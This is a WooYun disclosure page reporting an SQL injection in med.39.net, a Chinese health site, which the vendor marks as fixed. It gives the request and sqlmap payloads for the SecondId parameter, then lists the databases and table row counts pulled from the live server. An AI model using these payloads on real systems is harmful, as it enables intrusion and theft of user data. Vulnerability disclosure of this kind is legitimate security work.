当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115300

漏洞标题:39健康网某处SQL注射漏洞涉及大量表

相关厂商:39健康网

漏洞作者: 路人甲

提交时间:2015-05-21 12:17

修复时间:2015-05-22 10:35

公开时间:2015-05-22 10:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-05-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

233

详细说明:

和上一个洞比较类似,上一个的确是修复了。但是在其他地方post的时候,问题又出现了。
POST /cds/ssk/list.aspx?LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Cookie: ***
Host: med.39.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Top1%24btnSearch=%cb%d1%20%cb%f7&Top1%24keywords=1&__EVENTVALIDATION=/wEWAwKLuYmzBwLJmJmhDQK1ua7iCo7ZrN4KLSRjbf8/Lc64b5gYwipN&__VIEWSTATE=/wEPDwUKMTI0NjM2NzQ5NGRkm%2b0HjFY8r0K9szydYFB8Qoqtpx8%3d

漏洞证明:

---
Parameter: SecondId (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=(SELECT (CASE WHEN
(9263=9263) THEN 9263 ELSE 9263*(SELECT 9263 FROM master..sysdatabases) END))
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 AND 2316=CONVERT(
INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN
 (2316=2316) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHA
R(122)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=(SELECT CHAR(113)+C
HAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3237=3237) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1;WAITFOR DELAY '0:
0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 WAITFOR DELAY '0:
0:5'
---
[12:00:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2005
available databases [26]:
[*] 39Security
[*] 39Security_15
[*] 39Security_17
[*] cme
[*] cme_beta
[*] DataCenter
[*] DataSetting_test
[*] distribution
[*] master
[*] medphoto
[*] MobileData
[*] model
[*] msdb
[*] PhotoDB
[*] ProductLibData
[*] ProductLibSetting
[*] RuiHui
[*] RuiHui2012
[*] Security39
[*] SecurityNew
[*] Survey
[*] tempdb
[*] wcyx
[*] xiaopro
[*] YaYuDB
[*] YunYinDB
Database: cme
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.Member                           | 80864   |
| dbo.EmailVerify                      | 39151   |
| dbo.TestPaperFinish                  | 39048   |
| dbo.ScoreLog                         | 36073   |
| dbo.TestPaperFinishMain              | 32101   |
| dbo.OperationLog                     | 27744   |
| dbo.vW_MyOperationLog                | 24125   |
| dbo.vW_OperationLog                  | 23886   |
| dbo.PointLists                       | 23283   |
| dbo.ToolPreviewLog                   | 22221   |
| dbo.vW_ToolPreviewLog                | 22221   |
| dbo.DbDiseaseToDiagnoseCriterion     | 14550   |
| dbo.vw_DbDiseaseToDiagnoseCriterion  | 14550   |
| dbo.Answers                          | 12069   |
| dbo.DbDiseaseToInternationalClass    | 11406   |
| dbo.vw_DbDiseaseToInternationalClass | 11406   |
| dbo.DbResourcesToDictionary          | 8567    |
| dbo.vw_DbResourcesToDictionary       | 8567    |
| dbo.ToolDrugDetaRelateInfo           | 8156    |
| dbo.Article                          | 4882    |
| dbo.CourseLog                        | 4822    |
| dbo.DbPic                            | 4416    |
| dbo.vw_dbPic                         | 4416    |
| dbo.PrivateMsg                       | 4185    |
| dbo.vW_ReceivedPrivateMessage        | 4185    |
| dbo.vW_SendedPrivateMessage          | 4185    |
| dbo.DbOperationToICD                 | 3836    |
| dbo.vw_DbOperationToICD              | 3836    |
| dbo.Region                           | 3378    |
| dbo.CourseList                       | 3223    |
| dbo.Questions                        | 2651    |
| dbo.DbDiseaseToClinicDepartment      | 2608    |
| dbo.vw_DbDiseaseToClinicDepartment   | 2608    |
| dbo.OperationLogBackUp               | 2527    |
| dbo.MemberCard                       | 1908    |
| dbo.Concern                          | 1752    |
| dbo.vW_Concern                       | 1742    |
| dbo.vW_Concerned                     | 1734    |
| dbo.GroupTopicReply                  | 1653    |
| dbo.DbSymptomCode                    | 1620    |
| dbo.vw_DbSymptomCode                 | 1620    |
| dbo.MemberCardDetail                 | 1580    |
| dbo.DbClass                          | 1562    |
| dbo.ToolActionLog                    | 1481    |
| dbo.DbOperationToBase                | 1355    |
| dbo.vw_DbOperationToBase             | 1355    |
| dbo.Collection                       | 1264    |
| dbo.Comment                          | 1190    |
| dbo.DbResource                       | 1139    |
| dbo.vW_DbResource                    | 1139    |
| dbo.vW_Comment                       | 1135    |
| dbo.Say                              | 1060    |
| dbo.vW_Say                           | 1060    |
| dbo.DbDrugInteractions               | 1036    |
| dbo.vw_DbDrugInteractions            | 1036    |
| dbo.GroupMember                      | 1023    |

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-22 10:34

厂商回复:

已处理

最新状态:

2015-05-22:已修复